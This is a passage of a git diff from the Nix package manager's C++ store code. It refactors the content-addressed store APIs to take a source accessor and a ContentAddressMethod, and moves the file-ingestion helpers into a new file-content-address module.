srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) + std::string_view name, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter, + RepairFlag repair) { /* FIXME: Make BinaryCacheStore::addToStoreCommon support non-recursive+sha256 so we can just use the default implementation of this method in terms of addToStoreFromDump. 
*/ - HashSink sink { hashAlgo }; - if (method == FileIngestionMethod::Recursive) { - dumpPath(srcPath, sink, filter); - } else { - readFile(srcPath, sink); - } - auto h = sink.finish().first; + auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter).first; auto source = sinkToSource([&](Sink & sink) { - dumpPath(srcPath, sink, filter); + accessor.dumpPath(path, sink, filter); }); return addToStoreCommon(*source, repair, CheckSigs, [&](HashResult nar) { ValidPathInfo info { *this, name, - FixedOutputInfo { - .method = method, - .hash = h, - .references = { + ContentAddressWithReferences::fromParts( + method, + h, + { .others = references, // caller is not capable of creating a self-reference, because this is content-addressed without modulus .self = false, - }, - }, + }), nar.first, }; info.narSize = nar.second; diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh index 395e1b479..dbe4ac180 100644 --- a/src/libstore/binary-cache-store.hh +++ b/src/libstore/binary-cache-store.hh @@ -123,17 +123,23 @@ public: void addToStore(const ValidPathInfo & info, Source & narSource, RepairFlag repair, CheckSigsFlag checkSigs) override; - StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) override; + StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) override; StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override; + std::string_view name, + SourceAccessor & accessor, + const CanonPath & srcPath, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter, + 
RepairFlag repair) override; StorePath addTextToStore( std::string_view name, diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index 802b39f84..e4828dd2f 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -20,6 +20,7 @@ #include "child.hh" #include "unix-domain-socket.hh" #include "posix-fs-canonicalise.hh" +#include "posix-source-accessor.hh" #include #include @@ -1290,13 +1291,14 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In { throw Error("queryPathFromHashPart"); } StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override + std::string_view name, + SourceAccessor & accessor, + const CanonPath & srcPath, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter, + RepairFlag repair) override { throw Error("addToStore"); } void addToStore(const ValidPathInfo & info, Source & narSource, @@ -1318,14 +1320,14 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In } StorePath addToStoreFromDump( - Source & dump, - std::string_view name, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - RepairFlag repair, - const StorePathSet & references) override + Source & dump, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) override { - auto path = next->addToStoreFromDump(dump, name, method, hashAlgo, repair, references); + auto path = next->addToStoreFromDump(dump, name, method, hashAlgo, references, repair); goal.addDependency(path); return path; } @@ -2453,8 +2455,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() throw BuildError( "output path %1% without valid stats info", 
actualPath); - if (outputHash.method == ContentAddressMethod { FileIngestionMethod::Flat } || - outputHash.method == ContentAddressMethod { TextIngestionMethod {} }) + if (outputHash.method.getFileIngestionMethod() == FileIngestionMethod::Flat) { /* The output path should be a regular file without execute permission. */ if (!S_ISREG(st->st_mode) || (st->st_mode & S_IXUSR) != 0) @@ -2466,38 +2467,23 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() rewriteOutput(outputRewrites); /* FIXME optimize and deduplicate with addToStore */ std::string oldHashPart { scratchPath->hashPart() }; - HashModuloSink caSink {outputHash.hashAlgo, oldHashPart }; - std::visit(overloaded { - [&](const TextIngestionMethod &) { - readFile(actualPath, caSink); - }, - [&](const FileIngestionMethod & m2) { - switch (m2) { - case FileIngestionMethod::Recursive: - dumpPath(actualPath, caSink); - break; - case FileIngestionMethod::Flat: - readFile(actualPath, caSink); - break; - } - }, - }, outputHash.method.raw); - auto got = caSink.finish().first; + auto got = ({ + HashModuloSink caSink { outputHash.hashAlgo, oldHashPart }; + PosixSourceAccessor accessor; + dumpPath( + accessor, CanonPath { actualPath }, + caSink, + outputHash.method.getFileIngestionMethod()); + caSink.finish().first; + }); - auto optCA = ContentAddressWithReferences::fromPartsOpt( - outputHash.method, - std::move(got), - rewriteRefs()); - if (!optCA) { - // TODO track distinct failure modes separately (at the time of - // writing there is just one but `nullopt` is unclear) so this - // message can't get out of sync. 
- throw BuildError("output path '%s' has illegal content address, probably a spurious self-reference with text hashing"); - } ValidPathInfo newInfo0 { worker.store, outputPathName(drv->name, outputName), - std::move(*optCA), + ContentAddressWithReferences::fromParts( + outputHash.method, + std::move(got), + rewriteRefs()), Hash::dummy, }; if (*scratchPath != newInfo0.path) { @@ -2511,9 +2497,14 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() std::string(newInfo0.path.hashPart())}}); } - HashResult narHashAndSize = hashPath(HashAlgorithm::SHA256, actualPath); - newInfo0.narHash = narHashAndSize.first; - newInfo0.narSize = narHashAndSize.second; + { + PosixSourceAccessor accessor; + HashResult narHashAndSize = hashPath( + accessor, CanonPath { actualPath }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256); + newInfo0.narHash = narHashAndSize.first; + newInfo0.narSize = narHashAndSize.second; + } assert(newInfo0.ca); return newInfo0; @@ -2531,7 +2522,10 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() std::string { scratchPath->hashPart() }, std::string { requiredFinalPath.hashPart() }); rewriteOutput(outputRewrites); - auto narHashAndSize = hashPath(HashAlgorithm::SHA256, actualPath); + PosixSourceAccessor accessor; + HashResult narHashAndSize = hashPath( + accessor, CanonPath { actualPath }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256); ValidPathInfo newInfo0 { requiredFinalPath, narHashAndSize.first }; newInfo0.narSize = narHashAndSize.second; auto refs = rewriteRefs(); diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc index 9b8c36286..399ad47fd 100644 --- a/src/libstore/build/worker.cc +++ b/src/libstore/build/worker.cc @@ -519,7 +519,9 @@ bool Worker::pathContentsGood(const StorePath & path) if (!pathExists(store.printStorePath(path))) res = false; else { - HashResult current = hashPath(info->narHash.algo, store.printStorePath(path)); + HashResult current = hashPath( + *store.getFSAccessor(), 
CanonPath { store.printStorePath(path) }, + FileIngestionMethod::Recursive, info->narHash.algo); Hash nullHash(HashAlgorithm::SHA256); res = info->narHash == nullHash || info->narHash == current.first; } diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc index f42a13126..fc408f5af 100644 --- a/src/libstore/content-address.cc +++ b/src/libstore/content-address.cc @@ -50,6 +50,18 @@ std::string ContentAddressMethod::render(HashAlgorithm ha) const }, raw); } +FileIngestionMethod ContentAddressMethod::getFileIngestionMethod() const +{ + return std::visit(overloaded { + [&](const TextIngestionMethod & th) { + return FileIngestionMethod::Flat; + }, + [&](const FileIngestionMethod & fim) { + return fim; + } + }, raw); +} + std::string ContentAddress::render() const { return std::visit(overloaded { @@ -79,7 +91,7 @@ static std::pair parseContentAddressMethodP prefix = *optPrefix; } - auto parseHashType_ = [&](){ + auto parseHashAlgorithm_ = [&](){ auto hashTypeRaw = splitPrefixTo(rest, ':'); if (!hashTypeRaw) throw UsageError("content address hash must be in form ':', but found: %s", wholeInput); @@ -90,7 +102,7 @@ static std::pair parseContentAddressMethodP // Switch on prefix if (prefix == "text") { // No parsing of the ingestion method, "text" only support flat. 
- HashAlgorithm hashAlgo = parseHashType_(); + HashAlgorithm hashAlgo = parseHashAlgorithm_(); return { TextIngestionMethod {}, std::move(hashAlgo), @@ -100,7 +112,7 @@ static std::pair parseContentAddressMethodP auto method = FileIngestionMethod::Flat; if (splitPrefix(rest, "r:")) method = FileIngestionMethod::Recursive; - HashAlgorithm hashAlgo = parseHashType_(); + HashAlgorithm hashAlgo = parseHashAlgorithm_(); return { std::move(method), std::move(hashAlgo), @@ -176,13 +188,13 @@ ContentAddressWithReferences ContentAddressWithReferences::withoutRefs(const Con }, ca.method.raw); } -std::optional ContentAddressWithReferences::fromPartsOpt( - ContentAddressMethod method, Hash hash, StoreReferences refs) noexcept +ContentAddressWithReferences ContentAddressWithReferences::fromParts( + ContentAddressMethod method, Hash hash, StoreReferences refs) { return std::visit(overloaded { - [&](TextIngestionMethod _) -> std::optional { + [&](TextIngestionMethod _) -> ContentAddressWithReferences { if (refs.self) - return std::nullopt; + throw Error("self-reference not allowed with text hashing"); return ContentAddressWithReferences { TextInfo { .hash = std::move(hash), @@ -190,7 +202,7 @@ std::optional ContentAddressWithReferences::fromPa } }; }, - [&](FileIngestionMethod m2) -> std::optional { + [&](FileIngestionMethod m2) -> ContentAddressWithReferences { return ContentAddressWithReferences { FixedOutputInfo { .method = m2, diff --git a/src/libstore/content-address.hh b/src/libstore/content-address.hh index 05234da38..6863ad260 100644 --- a/src/libstore/content-address.hh +++ b/src/libstore/content-address.hh @@ -4,6 +4,7 @@ #include #include "hash.hh" #include "path.hh" +#include "file-content-address.hh" #include "comparator.hh" #include "variant-wrapper.hh" @@ -31,22 +32,6 @@ namespace nix { */ struct TextIngestionMethod : std::monostate { }; -/** - * An enumeration of the main ways we can serialize file system - * objects. 
- */ -enum struct FileIngestionMethod : uint8_t { - /** - * Flat-file hashing. Directly ingest the contents of a single file - */ - Flat = 0, - /** - * Recursive (or NAR) hashing. Serializes the file-system object in Nix - * Archive format and ingest that - */ - Recursive = 1 -}; - /** * Compute the prefix to the hash algorithm which indicates how the * files were ingested. @@ -54,7 +39,7 @@ enum struct FileIngestionMethod : uint8_t { std::string makeFileIngestionPrefix(FileIngestionMethod m); /** - * An enumeration of all the ways we can serialize file system objects. + * An enumeration of all the ways we can content-address store objects. * * Just the type of a content address. Combine with the hash itself, and * we have a `ContentAddress` as defined below. Combine that, in turn, @@ -102,7 +87,15 @@ struct ContentAddressMethod * * The rough inverse of `parse()`. */ - std::string render(HashAlgorithm ha) const; + std::string render(HashAlgorithm ht) const; + + /** + * Get the underlying way to content-address file system objects. + * + * Different ways of hashing store objects may use the same method + * for hashing file system objects. + */ + FileIngestionMethod getFileIngestionMethod() const; }; @@ -266,11 +259,12 @@ struct ContentAddressWithReferences * * @param refs References to other store objects or oneself. * - * Do note that not all combinations are supported; `nullopt` is - * returns for invalid combinations. + * @note Not all combinations are supported. This is a + * *partial function* and exceptions will be thrown for invalid + * combinations. 
*/ - static std::optional fromPartsOpt( - ContentAddressMethod method, Hash hash, StoreReferences refs) noexcept; + static ContentAddressWithReferences fromParts( + ContentAddressMethod method, Hash hash, StoreReferences refs); ContentAddressMethod getMethod() const; diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index a112d6d31..574263c68 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -403,22 +403,9 @@ static void performOp(TunnelLogger * logger, ref store, auto [contentAddressMethod, hashAlgo_] = ContentAddressMethod::parse(camStr); auto hashAlgo = hashAlgo_; // work around clang bug FramedSource source(from); - // TODO this is essentially RemoteStore::addCAToStore. Move it up to Store. - return std::visit(overloaded { - [&](const TextIngestionMethod &) { - if (hashAlgo != HashAlgorithm::SHA256) - throw UnimplementedError("When adding text-hashed data called '%s', only SHA-256 is supported but '%s' was given", - name, printHashAlgo(hashAlgo)); - // We could stream this by changing Store - std::string contents = source.drain(); - auto path = store->addTextToStore(name, contents, refs, repair); - return store->queryPathInfo(path); - }, - [&](const FileIngestionMethod & fim) { - auto path = store->addToStoreFromDump(source, name, fim, hashAlgo, repair, refs); - return store->queryPathInfo(path); - }, - }, contentAddressMethod.raw); + // TODO these two steps are essentially RemoteStore::addCAToStore. Move it up to Store. 
+ auto path = store->addToStoreFromDump(source, name, contentAddressMethod, hashAlgo, refs, repair); + return store->queryPathInfo(path); }(); logger->stopWork(); diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh index c40c256bb..8b142ba2a 100644 --- a/src/libstore/legacy-ssh-store.hh +++ b/src/libstore/legacy-ssh-store.hh @@ -59,13 +59,14 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor { unsupported("queryPathFromHashPart"); } StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override + std::string_view name, + SourceAccessor & accessor, + const CanonPath & srcPath, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter, + RepairFlag repair) override { unsupported("addToStore"); } StorePath addTextToStore( diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 7e82bae28..cd8bf24f8 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -13,6 +13,7 @@ #include "compression.hh" #include "signals.hh" #include "posix-fs-canonicalise.hh" +#include "posix-source-accessor.hh" #include #include @@ -1088,11 +1089,22 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, if (info.ca) { auto & specified = *info.ca; - auto actualHash = hashCAPath( - specified.method, - specified.hash.algo, - info.path - ); + auto actualHash = ({ + HashModuloSink caSink { + specified.hash.algo, + std::string { info.path.hashPart() }, + }; + PosixSourceAccessor accessor; + dumpPath( + *getFSAccessor(false), + CanonPath { printStorePath(info.path) }, + caSink, + specified.method.getFileIngestionMethod()); + ContentAddress { + .method = specified.method, + .hash = caSink.finish().first, + }; + }); if (specified.hash != actualHash.hash) { throw Error("ca 
hash mismatch importing path '%s';\n specified: %s\n got: %s", printStorePath(info.path), @@ -1115,8 +1127,13 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, } -StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name, - FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) +StorePath LocalStore::addToStoreFromDump( + Source & source0, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) { /* For computing the store path. */ auto hashSink = std::make_unique(hashAlgo); @@ -1166,25 +1183,21 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name delTempDir = std::make_unique(tempDir); tempPath = tempDir + "/x"; - if (method == FileIngestionMethod::Recursive) - restorePath(tempPath, bothSource); - else - writeFile(tempPath, bothSource); + restorePath(tempPath, bothSource, method.getFileIngestionMethod()); dump.clear(); } auto [hash, size] = hashSink->finish(); - ContentAddressWithReferences desc = FixedOutputInfo { - .method = method, - .hash = hash, - .references = { + auto desc = ContentAddressWithReferences::fromParts( + method, + hash, + { .others = references, // caller is not capable of creating a self-reference, because this is content-addressed without modulus .self = false, - }, - }; + }); auto dstPath = makeFixedOutputPathFromCA(name, desc); @@ -1207,11 +1220,8 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name if (inMemory) { StringSource dumpSource { dump }; - /* Restore from the NAR in memory. */ - if (method == FileIngestionMethod::Recursive) - restorePath(realPath, dumpSource); - else - writeFile(realPath, dumpSource); + /* Restore from the buffer in memory. */ + restorePath(realPath, dumpSource, method.getFileIngestionMethod()); } else { /* Move the temporary path we restored above. 
*/ moveFile(tempPath, realPath); @@ -1389,7 +1399,10 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) for (auto & link : readDirectory(linksDir)) { printMsg(lvlTalkative, "checking contents of '%s'", link.name); Path linkPath = linksDir + "/" + link.name; - std::string hash = hashPath(HashAlgorithm::SHA256, linkPath).first.to_string(HashFormat::Nix32, false); + PosixSourceAccessor accessor; + std::string hash = hashPath( + accessor, CanonPath { linkPath }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first.to_string(HashFormat::Nix32, false); if (hash != link.name) { printError("link '%s' was modified! expected hash '%s', got '%s'", linkPath, link.name, hash); @@ -1696,42 +1709,6 @@ void LocalStore::queryRealisationUncached(const DrvOutput & id, } } -ContentAddress LocalStore::hashCAPath( - const ContentAddressMethod & method, const HashAlgorithm & hashAlgo, - const StorePath & path) -{ - return hashCAPath(method, hashAlgo, Store::toRealPath(path), path.hashPart()); -} - -ContentAddress LocalStore::hashCAPath( - const ContentAddressMethod & method, - const HashAlgorithm & hashAlgo, - const Path & path, - const std::string_view pathHash -) -{ - HashModuloSink caSink ( hashAlgo, std::string(pathHash) ); - std::visit(overloaded { - [&](const TextIngestionMethod &) { - readFile(path, caSink); - }, - [&](const FileIngestionMethod & m2) { - switch (m2) { - case FileIngestionMethod::Recursive: - dumpPath(path, caSink); - break; - case FileIngestionMethod::Flat: - readFile(path, caSink); - break; - } - }, - }, method.raw); - return ContentAddress { - .method = method, - .hash = caSink.finish().first, - }; -} - void LocalStore::addBuildLog(const StorePath & drvPath, std::string_view log) { assert(drvPath.isDerivation()); diff --git a/src/libstore/local-store.hh b/src/libstore/local-store.hh index ee605b5a2..a8323fe5a 100644 --- a/src/libstore/local-store.hh +++ b/src/libstore/local-store.hh @@ -177,8 +177,13 @@ public: void addToStore(const 
ValidPathInfo & info, Source & source, RepairFlag repair, CheckSigsFlag checkSigs) override; - StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) override; + StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) override; StorePath addTextToStore( std::string_view name, @@ -350,19 +355,6 @@ private: void signPathInfo(ValidPathInfo & info); void signRealisation(Realisation &); - // XXX: Make a generic `Store` method - ContentAddress hashCAPath( - const ContentAddressMethod & method, - const HashAlgorithm & hashAlgo, - const StorePath & path); - - ContentAddress hashCAPath( - const ContentAddressMethod & method, - const HashAlgorithm & hashAlgo, - const Path & path, - const std::string_view pathHash - ); - void addBuildLog(const StorePath & drvPath, std::string_view log) override; friend struct LocalDerivationGoal; diff --git a/src/libstore/optimise-store.cc b/src/libstore/optimise-store.cc index b395453d1..a494e6ecc 100644 --- a/src/libstore/optimise-store.cc +++ b/src/libstore/optimise-store.cc @@ -2,6 +2,7 @@ #include "globals.hh" #include "signals.hh" #include "posix-fs-canonicalise.hh" +#include "posix-source-accessor.hh" #include #include @@ -146,7 +147,12 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, Also note that if `path' is a symlink, then we're hashing the contents of the symlink (i.e. the result of readlink()), not the contents of the target (which may not even exist). 
*/ - Hash hash = hashPath(HashAlgorithm::SHA256, path).first; + Hash hash = ({ + PosixSourceAccessor accessor; + hashPath( + accessor, CanonPath { path }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first; + }); debug("'%1%' has hash '%2%'", path, hash.to_string(HashFormat::Nix32, true)); /* Check if this is a known hash. */ @@ -156,7 +162,12 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, if (pathExists(linkPath)) { auto stLink = lstat(linkPath); if (st.st_size != stLink.st_size - || (repair && hash != hashPath(HashAlgorithm::SHA256, linkPath).first)) + || (repair && hash != ({ + PosixSourceAccessor accessor; + hashPath( + accessor, CanonPath { linkPath }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first; + }))) { // XXX: Consider overwriting linkPath with our valid version. warn("removing corrupted link '%s'", linkPath); diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index dd6347468..567776b67 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -502,8 +502,13 @@ ref RemoteStore::addCAToStore( } -StorePath RemoteStore::addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) +StorePath RemoteStore::addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) { return addCAToStore(dump, name, method, hashAlgo, references, repair)->path; } diff --git a/src/libstore/remote-store.hh b/src/libstore/remote-store.hh index f2e34c1a3..68824a737 100644 --- a/src/libstore/remote-store.hh +++ b/src/libstore/remote-store.hh @@ -82,10 +82,15 @@ public: RepairFlag repair); /** - * Add a content-addressable store path. Does not support references. `dump` will be drained. + * Add a content-addressable store path. `dump` will be drained. 
*/ - StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, RepairFlag repair = NoRepair, const StorePathSet & references = StorePathSet()) override; + StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + RepairFlag repair = NoRepair) override; void addToStore(const ValidPathInfo & info, Source & nar, RepairFlag repair, CheckSigsFlag checkSigs) override; diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 7f35e74af..5b4c6c765 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -232,22 +232,28 @@ StorePath StoreDirConfig::makeFixedOutputPathFromCA(std::string_view name, const } -std::pair StoreDirConfig::computeStorePathFromDump( - Source & dump, - std::string_view name, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - const StorePathSet & references) const +std::pair StoreDirConfig::computeStorePath( + std::string_view name, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter) const { - HashSink sink(hashAlgo); - dump.drainInto(sink); - auto h = sink.finish().first; - FixedOutputInfo caInfo { - .method = method, - .hash = h, - .references = {}, + auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter).first; + return { + makeFixedOutputPathFromCA( + name, + ContentAddressWithReferences::fromParts( + method, + h, + { + .others = references, + .self = false, + })), + h, }; - return std::make_pair(makeFixedOutputPath(name, caInfo), h); } @@ -264,22 +270,19 @@ StorePath StoreDirConfig::computeStorePathForText( StorePath Store::addToStore( - std::string_view name, - const 
Path & _srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) + std::string_view name, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter, + RepairFlag repair) { - Path srcPath(absPath(_srcPath)); auto source = sinkToSource([&](Sink & sink) { - if (method == FileIngestionMethod::Recursive) - dumpPath(srcPath, sink, filter); - else - readFile(srcPath, sink); + dumpPath(accessor, path, sink, method.getFileIngestionMethod(), filter); }); - return addToStoreFromDump(*source, name, method, hashAlgo, repair, references); + return addToStoreFromDump(*source, name, method, hashAlgo, references, repair); } void Store::addMultipleToStore( @@ -404,9 +407,13 @@ digraph graphname { fileSink -> caHashSink } */ -ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, - FileIngestionMethod method, HashAlgorithm hashAlgo, - std::optional expectedCAHash) +ValidPathInfo Store::addToStoreSlow( + std::string_view name, + SourceAccessor & accessor, + const CanonPath & srcPath, + ContentAddressMethod method, HashAlgorithm hashAlgo, + const StorePathSet & references, + std::optional expectedCAHash) { HashSink narHashSink { HashAlgorithm::SHA256 }; HashSink caHashSink { hashAlgo }; @@ -425,7 +432,7 @@ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, srcPath. The fact that we use scratchpadSink as a temporary buffer here is an implementation detail. 
*/ auto fileSource = sinkToSource([&](Sink & scratchpadSink) { - dumpPath(srcPath, scratchpadSink); + accessor.dumpPath(srcPath, scratchpadSink); }); /* tapped provides the same data as fileSource, but we also write all the @@ -433,9 +440,11 @@ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, TeeSource tapped { *fileSource, narSink }; NullParseSink blank; - auto & parseSink = method == FileIngestionMethod::Flat + auto & parseSink = method.getFileIngestionMethod() == FileIngestionMethod::Flat ? (ParseSink &) fileSink - : (ParseSink &) blank; + : method.getFileIngestionMethod() == FileIngestionMethod::Recursive + ? (ParseSink &) blank + : (abort(), (ParseSink &)*(ParseSink *)nullptr); // handled both cases /* The information that flows from tapped (besides being replicated in narSink), is now put in parseSink. */ @@ -452,21 +461,24 @@ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, if (expectedCAHash && expectedCAHash != hash) throw Error("hash mismatch for '%s'", srcPath); + ValidPathInfo info { *this, name, - FixedOutputInfo { - .method = method, - .hash = hash, - .references = {}, - }, + ContentAddressWithReferences::fromParts( + method, + hash, + { + .others = references, + .self = false, + }), narHash, }; info.narSize = narSize; if (!isValidPath(info.path)) { auto source = sinkToSource([&](Sink & scratchpadSink) { - dumpPath(srcPath, scratchpadSink); + accessor.dumpPath(srcPath, scratchpadSink); }); addToStore(info, *source); } diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 2c883ce97..fc0a82a73 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -427,22 +427,28 @@ public: * libutil/archive.hh). 
*/ virtual StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method = FileIngestionMethod::Recursive, - HashAlgorithm hashAlgo = HashAlgorithm::SHA256, - PathFilter & filter = defaultPathFilter, - RepairFlag repair = NoRepair, - const StorePathSet & references = StorePathSet()); + std::string_view name, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + PathFilter & filter = defaultPathFilter, + RepairFlag repair = NoRepair); /** * Copy the contents of a path to the store and register the * validity the resulting path, using a constant amount of * memory. */ - ValidPathInfo addToStoreSlow(std::string_view name, const Path & srcPath, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, - std::optional expectedCAHash = {}); + ValidPathInfo addToStoreSlow( + std::string_view name, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + std::optional expectedCAHash = {}); /** * Like addToStore(), but the contents of the path are contained @@ -453,9 +459,13 @@ public: * * \todo remove? 
*/ - virtual StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, RepairFlag repair = NoRepair, - const StorePathSet & references = StorePathSet()) + virtual StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + RepairFlag repair = NoRepair) { unsupported("addToStoreFromDump"); } /** diff --git a/src/libstore/store-dir-config.hh b/src/libstore/store-dir-config.hh index 8dafca096..0fc8ded9c 100644 --- a/src/libstore/store-dir-config.hh +++ b/src/libstore/store-dir-config.hh @@ -91,15 +91,17 @@ struct StoreDirConfig : public Config StorePath makeFixedOutputPathFromCA(std::string_view name, const ContentAddressWithReferences & ca) const; /** - * Read-only variant of addToStoreFromDump(). It returns the store - * path to which a NAR or flat file would be written. + * Read-only variant of addToStore(). It returns the store + * path for the given file system object. */ - std::pair computeStorePathFromDump( - Source & dump, + std::pair computeStorePath( std::string_view name, - FileIngestionMethod method = FileIngestionMethod::Recursive, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, - const StorePathSet & references = {}) const; + const StorePathSet & references = {}, + PathFilter & filter = defaultPathFilter) const; /** * Preparatory part of addTextToStore(). 
diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc new file mode 100644 index 000000000..9917986f6 --- /dev/null +++ b/src/libutil/file-content-address.cc @@ -0,0 +1,49 @@ +#include "file-content-address.hh" +#include "archive.hh" + +namespace nix { + +void dumpPath( + SourceAccessor & accessor, const CanonPath & path, + Sink & sink, + FileIngestionMethod method, + PathFilter & filter) +{ + switch (method) { + case FileIngestionMethod::Flat: + accessor.readFile(path, sink); + break; + case FileIngestionMethod::Recursive: + accessor.dumpPath(path, sink, filter); + break; + } +} + + +void restorePath( + const Path & path, + Source & source, + FileIngestionMethod method) +{ + switch (method) { + case FileIngestionMethod::Flat: + writeFile(path, source); + break; + case FileIngestionMethod::Recursive: + restorePath(path, source); + break; + } +} + + +HashResult hashPath( + SourceAccessor & accessor, const CanonPath & path, + FileIngestionMethod method, HashAlgorithm ht, + PathFilter & filter) +{ + HashSink sink { ht }; + dumpPath(accessor, path, sink, method, filter); + return sink.finish(); +} + +} diff --git a/src/libutil/file-content-address.hh b/src/libutil/file-content-address.hh new file mode 100644 index 000000000..8e93f5847 --- /dev/null +++ b/src/libutil/file-content-address.hh @@ -0,0 +1,56 @@ +#pragma once +///@file + +#include "source-accessor.hh" +#include "fs-sink.hh" +#include "util.hh" + +namespace 